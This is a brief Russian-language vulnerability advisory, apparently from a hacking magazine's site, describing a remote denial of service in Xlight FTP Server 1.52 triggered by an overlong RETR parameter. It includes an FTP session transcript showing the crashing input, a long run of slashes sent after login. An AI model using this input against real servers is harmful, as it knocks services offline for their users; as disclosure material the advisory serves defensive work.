Удаленный отказ в обслуживании против Xlight FTP Server

Рекомендуем почитать:

Xakep #299. Sysmon

• Содержание выпуска
• Подписка на «Хакер»-60%

Программа: Xlight FTP Server 1.52 

Уязвимость обнаружена в Xlight FTP Server. Удаленный авторизованный пользователь может аварийно завершить работу FTP сервера.
Удаленный авторизованный пользователь может послать FTP RETR запрос с параметром более 260 байт, чтобы аварийно завершить работ FTP сервера. 

Пример: 

ftp> open
To 192.168.144.56
Connected to 192.168.144.56.
220 Xlight Server 1.52 ready...
User (192.168.144.56:(none)): test
331 Password required for test
Password:
230 Login OK.
ftp> literal pasv
227 Entering passive mode (192,168,144,56,5,8) .
ftp> literal retr ///////////////////////////
///////////////////////////////////////////////
///////////////////////////////////////////////
///////////////////////////////////////////////
//////////////////////////////////////////////////
//////////////////////////////////////////qwer
Connection closed by remote host.